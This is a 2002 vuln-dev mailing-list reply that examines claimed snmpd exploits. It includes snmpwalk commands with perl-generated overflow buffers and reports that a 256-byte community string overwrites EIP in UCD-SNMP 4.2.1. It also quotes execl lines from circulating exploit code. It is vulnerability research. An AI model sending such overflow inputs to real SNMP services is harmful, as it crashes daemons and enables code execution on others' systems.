Vulnerability Development mailing list archives
Re: snmpd exploit examination - snmpwalk
From: Syzop <syz () dds nl>
Date: Thu, 21 Feb 2002 22:59:19 +0100
Hi, KF wrote:
I am not so sure about those proof of concept remote snmp exploits that were posted... they look more like local exploits to me. [root@linuxppc root]# ps -ef | grep snmp root 6355 1 17 15:02 pts/1 00:00:59 /usr/sbin/snmpd -s -l /dev/null (gdb) r 127.0.0.1 public `perl -e 'print "A" x 293'` Starting program: /usr/bin/snmpwalk 127.0.0.1 public `perl -e 'print "A" x 293'` Program received signal SIGSEGV, Segmentation fault.
I get the same results with: snmpwalk 127.0.0.1 public <long buffer>. $ snmpwalk 127.0.0.1 public `perl -e 'print "A" x 3000'` Segmentation fault Feb 21 22:24:08 syzop kernel: pid 26942 (snmpwalk), uid 1001 exited on signal 11 reading or executing 0x41414141 However the exploit is doing: snmpwalk -p <port> <host> <long buffer> [..]
These are the examples I have seen in various emails as methods to exploit snmpd...These seem to do nothing on my box to the client or the daemon... snmpwalk 127.0.0.1 `perl -e 'print "\x90" x 256'` execl("snmpwalk", "snmpwalk", "-p", port, host, buf, NULL); execl("/usr/local/bin/snmpwalk","snmpwalk",argv[1],"-c",buffer,NULL);
I tested this after the mail of H D Moore: 'The UCD-SNMP4.2.1 package is trivial to exploit. A community string of exactly 256 bytes will smash eip.' so: $ snmpwalk 127.0.0.1 `perl -e 'print "A" x 256'` (then, syslog reports:) Feb 21 22:36:44 syzop kernel: pid 27154 (snmpd), uid 0 exited on signal 11 reading or executing 0x41414141 or at least here :)). Tested at rh7.1 and debian 2.2 (both ia32).
Here are my results.
--snip-- Same results as here with your values. It looks like it really has to be 256 chars here: 255 = nothing, 256 = EIP overwritten, 257 = nothing.
Give it too many chars and snmpwalk complains. [root@linuxppc mail.snosoft.com]# snmpwalk 127.0.0.1 `perl -e 'print "\x90" x 5000'` snmpwalk: Error building ASN.1 representation
Same here after ~8200 chars. Cya, Syzop. PS: Resend since I forgot to include vuln-dev :P
Current thread:
- snmpd exploit examination - snmpwalk KF (Feb 21)
- Re: snmpd exploit examination - snmpwalk Syzop (Feb 21)
- Message not available
- Re: snmpd exploit examination - snmpwalk KF (Feb 21)
- Re: snmpd exploit examination - snmpwalk xbud (Feb 21)
- <Possible follow-ups>
- Re: snmpd exploit examination - snmpwalk The Itch (Feb 21)